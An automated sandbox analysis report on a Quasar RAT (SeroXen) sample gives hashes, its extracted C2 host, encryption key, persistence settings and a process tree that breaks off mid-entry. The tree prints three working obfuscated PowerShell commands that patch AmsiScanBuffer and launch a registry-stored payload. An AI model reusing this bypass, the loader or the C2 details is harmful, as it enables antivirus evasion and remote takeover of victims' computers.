Analysis

  • max time kernel
    1800s
  • max time network
    1485s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240426-en
  • resource tags

    arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    11/05/2024, 06:13

General

  • Target

    Uni.exe

  • Size

    409KB

  • MD5

    4c2bb0618a6eda615c8001d5a7ccd6c0

  • SHA1

    c88d2c8bfc5906a5cfef78893d1132edcffd71f0

  • SHA256

    abcda524c02f9381d8d43f9ec0079d854db821d77f45e88f50606f46871f81d6

  • SHA512

    6abe53339656a023e2a0547f1c2249789c33091d67a21f2e689c6411dc5357e34ec3c65634b6f6955a5023d20803f7c746b13f574bcd84b008abb4a97ea61027

  • SSDEEP

    12288:rpg6M1i1v6q1ak/e7xlX7nnvGAwhJLJO:lxqiii6xlLvGjhO

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen

C2

tue-jake.gl.at.ply.gg:29058

Mutex

$Sxr-xPAuDxLNyBmZ7S2WLJ

Attributes
  • encryption_key

    Pw78RUs175dFrKD7lMwH

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    SeroXen

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 19 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:636
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:480
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{d4b11e8e-7177-4a6d-903d-a829bfc96d10}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3860
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{49a830f6-41c9-488c-b997-d4cac5815479}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2724
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{7ccdf146-0619-4bff-a31f-0ae2336930f1}
          2⤵
            PID:3936
        • C:\Windows\system32\lsass.exe
          C:\Windows\system32\lsass.exe
          1⤵
            PID:696
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
            1⤵
              PID:988
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
              1⤵
                PID:560
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                1⤵
                  PID:1044
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1104
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                    1⤵
                      PID:1112
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1140
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:MuIbDiJjcHtA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$gccJiOBvwIilLD,[Parameter(Position=1)][Type]$nercYUKzMK)$nsxEJVvlNAs=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'fl'+[Char](101)+''+[Char](99)+''+'t'+'e'+'d'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'gat'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'M'+'e'+'m'+[Char](111)+'r'+'y'+''+[Char](77)+''+'o'+'d'+'u'+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+'e'+'l'+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+''+'T'+'y'+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+'c'+''+','+''+[Char](83)+''+[Char](101)+'al'+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+'i'+'C'+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+'A'+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$nsxEJVvlNAs.DefineConstructor('R'+'T'+'Sp'+[Char](101)+''+[Char](99)+'i'+'a'+''+[Char](108)+'N'+[Char](97)+'m'+[Char](101)+','+'H'+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+[Char](121)+'Si'+'g'+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$gccJiOBvwIilLD).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+'e'+','+''+'M'+''+[Char](97)+''+'n'+'a'+'g'+''+[Char](101)+''+[Char](100)+'');$nsxEJVvlNAs.DefineMethod(''+[Char](73)+''+'n'+'v'+[Char](111)+''+'k'+'e','P'+'u'+''+[Char](98)+''+'l'+'ic'+','+'H'+[Char](105)+''+[Char](100)+'e'+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'tu'+[Char](97)+''+[Char](108)+'',$nercYUKzMK,$gccJiOBvwIilLD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+','+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'g'+'e'+''+[Char](100)+'');Write-Output $nsxEJVvlNAs.CreateType();}$dPDOCCNOAjPGM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'ste'+[Char](109)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+'o'+''+'f'+''+[Char](116)+''+[Char](46)+'Wi'+'n'+''+'3'+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+'s'+''+'a'+'f'+[Char](101)+'N'+'a'+''+[Char](116)+''+[Char](105)+'v'+'e'+'M'+'e'+''+[Char](116)+''+[Char](104)+''+'o'+'d'+[Char](115)+'');$ZGEXHQkZoomjQY=$dPDOCCNOAjPGM.GetMethod(''+'G'+''+'e'+''+[Char](116)+'P'+[Char](114)+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$oNhbtnuQaxYoJcckKiv=MuIbDiJjcHtA @([String])([IntPtr]);$sdrTnnOQyXmVDHnVPCmBBX=MuIbDiJjcHtA @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eKDqOOwkUaB=$dPDOCCNOAjPGM.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+'M'+''+[Char](111)+'d'+[Char](117)+''+'l'+''+'e'+''+[Char](72)+''+'a'+''+'n'+''+'d'+''+'l'+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+'n'+''+[Char](101)+''+'l'+''+'3'+'2'+'.'+''+[Char](100)+'ll')));$DzNGHrLsJdNdKo=$ZGEXHQkZoomjQY.Invoke($Null,@([Object]$eKDqOOwkUaB,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+''+'i'+''+'b'+''+[Char](114)+'ar'+'y'+''+'A'+'')));$WSlxUCQVTwiwcSoSJ=$ZGEXHQkZoomjQY.Invoke($Null,@([Object]$eKDqOOwkUaB,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+'a'+[Char](108)+''+'P'+'ro'+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$mPdnOdQ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DzNGHrLsJdNdKo,$oNhbtnuQaxYoJcckKiv).Invoke(''+[Char](97)+'m'+[Char](115)+''+[Char](105)+''+'.'+'dl'+[Char](108)+'');$qKHhaFnoynuirwRpE=$ZGEXHQkZoomjQY.Invoke($Null,@([Object]$mPdnOdQ,[Object]('A'+'m'+''+'s'+''+[Char](105)+''+'S'+'ca'+'n'+''+'B'+''+[Char](117)+'ffe'+[Char](114)+'')));$HRqgtldtua=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WSlxUCQVTwiwcSoSJ,$sdrTnnOQyXmVDHnVPCmBBX).Invoke($qKHhaFnoynuirwRpE,[uint32]8,4,[ref]$HRqgtldtua);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$qKHhaFnoynuirwRpE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WSlxUCQVTwiwcSoSJ,$sdrTnnOQyXmVDHnVPCmBBX).Invoke($qKHhaFnoynuirwRpE,[uint32]8,0x20,[ref]$HRqgtldtua);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+''+[Char](84)+'WA'+'R'+''+[Char](69)+'').GetValue(''+'$'+''+'7'+''+'7'+''+'s'+'t'+'a'+''+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:3200
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:4072
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mHOZXsQKSVgs{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$tcSxTwQxRsggGF,[Parameter(Position=1)][Type]$ltMPQmoFTf)$ZYJoBTwzQfa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+'f'+''+'l'+''+'e'+''+'c'+'t'+[Char](101)+''+[Char](100)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+'e'+'m'+''+[Char](111)+'ryM'+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+'ate'+[Char](84)+'y'+'p'+''+[Char](101)+'',''+[Char](67)+'la'+[Char](115)+'s'+[Char](44)+''+'P'+'u'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+','+''+'S'+'e'+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+',An'+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+'a'+[Char](115)+'s'+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$ZYJoBTwzQfa.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+'a'+'l'+''+[Char](78)+'am'+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$tcSxTwQxRsggGF).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+','+'M'+''+'a'+'na'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$ZYJoBTwzQfa.DefineMethod(''+'I'+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+',H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+'t'+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$ltMPQmoFTf,$tcSxTwQxRsggGF).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'ti'+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $ZYJoBTwzQfa.CreateType();}$DICPslAQvkjFZ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'te'+'m'+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+'i'+'c'+''+'r'+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+'t'+[Char](46)+''+[Char](87)+'i'+[Char](110)+'32'+'.'+''+'U'+'n'+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+'M'+''+'e'+''+'t'+''+'h'+''+'o'+''+[Char](100)+''+[Char](115)+'');$mapXQJBrntfClH=$DICPslAQvkjFZ.GetMethod('G'+[Char](101)+'t'+[Char](80)+'r'+[Char](111)+'c'+'A'+''+[Char](100)+''+[Char](100)+'res'+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+'S'+'ta'+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$URCfweNGnxBURhpACyE=mHOZXsQKSVgs @([String])([IntPtr]);$yJbomBjYzVxqTBWtUNYEsY=mHOZXsQKSVgs @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BsvDXkhvqRZ=$DICPslAQvkjFZ.GetMethod('G'+'e'+'t'+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+'eHan'+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+[Char](101)+'l'+[Char](51)+''+'2'+''+'.'+'d'+'l'+''+[Char](108)+'')));$RITTkbjHOvziPE=$mapXQJBrntfClH.Invoke($Null,@([Object]$BsvDXkhvqRZ,[Object]('L'+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+'a'+''+[Char](114)+''+[Char](121)+''+'A'+'')));$zPPYFJtTxIWhkLSPk=$mapXQJBrntfClH.Invoke($Null,@([Object]$BsvDXkhvqRZ,[Object]('Vi'+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+'ro'+[Char](116)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$huGbwkx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RITTkbjHOvziPE,$URCfweNGnxBURhpACyE).Invoke(''+[Char](97)+''+'m'+''+'s'+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$EIzVDxtKTZgPXsNwQ=$mapXQJBrntfClH.Invoke($Null,@([Object]$huGbwkx,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+'c'+''+'a'+'n'+'B'+'u'+'f'+''+[Char](102)+''+[Char](101)+'r')));$NBCMbRdsxv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zPPYFJtTxIWhkLSPk,$yJbomBjYzVxqTBWtUNYEsY).Invoke($EIzVDxtKTZgPXsNwQ,[uint32]8,4,[ref]$NBCMbRdsxv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EIzVDxtKTZgPXsNwQ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zPPYFJtTxIWhkLSPk,$yJbomBjYzVxqTBWtUNYEsY).Invoke($EIzVDxtKTZgPXsNwQ,[uint32]8,0x20,[ref]$NBCMbRdsxv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+'R'+'E'+'').GetValue('$'+[Char](55)+''+'7'+''+[Char](115)+'t'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4964
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:3816
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:xoEmrRnvppLE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$DMPLXUHxVuWdfY,[Parameter(Position=1)][Type]$sMvZOBHyMa)$GKrFviRsHdn=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'fl'+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+'De'+'l'+''+'e'+''+'g'+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+'l'+'e'+''+'g'+''+[Char](97)+'te'+[Char](84)+'y'+[Char](112)+'e',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+'s'+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+'i'+'c'+''+[Char](44)+''+'S'+'e'+'a'+''+'l'+''+'e'+'d'+','+''+[Char](65)+''+'n'+'s'+'i'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+[Char](116)+'o'+'C'+''+'l'+''+'a'+'ss',[MulticastDelegate]);$GKrFviRsHdn.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+''+'a'+'l'+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+[Char](103)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+'l'+''+'i'+'c',[Reflection.CallingConventions]::Standard,$DMPLXUHxVuWdfY).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+'m'+''+'e'+''+[Char](44)+'Man'+[Char](97)+''+[Char](103)+'ed');$GKrFviRsHdn.DefineMethod('I'+[Char](110)+'vo'+'k'+''+[Char](101)+'','Pu'+[Char](98)+'li'+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+'y'+[Char](83)+'i'+'g'+''+[Char](44)+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t'+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$sMvZOBHyMa,$DMPLXUHxVuWdfY).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+','+[Char](77)+''+'a'+''+[Char](110)+'ag'+[Char](101)+''+[Char](100)+'');Write-Output $GKrFviRsHdn.CreateType();}$XTtutHuAChGAJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+[Char](116)+'e'+'m'+''+'.'+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+'sof'+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n3'+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+''+'t'+'h'+[Char](111)+''+'d'+''+'s'+'');$KbfFeJhmtAYigQ=$XTtutHuAChGAJ.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+'oc'+'A'+''+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$vTGDuvuaknOZpHwusiq=xoEmrRnvppLE @([String])([IntPtr]);$PzljzfACaehZLCikUtuyvD=xoEmrRnvppLE @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$GrojBDLGpWB=$XTtutHuAChGAJ.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+'a'+''+[Char](110)+'dl'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'n'+'e'+''+[Char](108)+'3'+'2'+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')));$gnGgQXEBxrFaRf=$KbfFeJhmtAYigQ.Invoke($Null,@([Object]$GrojBDLGpWB,[Object](''+'L'+''+[Char](111)+'a'+[Char](100)+''+[Char](76)+''+'i'+'br'+[Char](97)+''+'r'+'yA')));$vSCEXsIuHnKKgDbYQ=$KbfFeJhmtAYigQ.Invoke($Null,@([Object]$GrojBDLGpWB,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+''+'u'+''+[Char](97)+''+'l'+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$wEIJFdX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gnGgQXEBxrFaRf,$vTGDuvuaknOZpHwusiq).Invoke(''+'a'+''+[Char](109)+'s'+'i'+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$WDtSrBXcywZqcBiCt=$KbfFeJhmtAYigQ.Invoke($Null,@([Object]$wEIJFdX,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+'er')));$qWOpLtpOOs=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vSCEXsIuHnKKgDbYQ,$PzljzfACaehZLCikUtuyvD).Invoke($WDtSrBXcywZqcBiCt,[uint32]8,4,[ref]$qWOpLtpOOs);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$WDtSrBXcywZqcBiCt,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vSCEXsIuHnKKgDbYQ,$PzljzfACaehZLCikUtuyvD).Invoke($WDtSrBXcywZqcBiCt,[uint32]8,0x20,[ref]$qWOpLtpOOs);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+'7'+'s'+''+[Char](116)+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            PID:1124
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              3⤵
                                PID:4696
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1164
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                              1⤵
                                PID:1268
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                1⤵
                                  PID:1304
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                  1⤵
                                    PID:1360
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1420
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:2596
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                        1⤵
                                        • Drops file in System32 directory
                                        PID:1552
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                        1⤵
                                          PID:1616
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                          1⤵
                                            PID:1624
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k NetworkService -p
                                            1⤵
                                              PID:1676
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                              1⤵
                                                PID:1724
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                1⤵
                                                  PID:1760
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1840
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                    1⤵
                                                      PID:1868
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:1980
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1992
                                                        • C:\Windows\system32\svchost.exe
